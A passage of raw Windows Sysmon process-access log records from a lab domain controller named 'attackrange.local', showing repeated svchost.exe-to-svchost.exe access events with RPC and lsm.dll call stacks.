13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.180{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.180{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.180{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.180{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.180{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.180{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.180{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.149{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.149{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 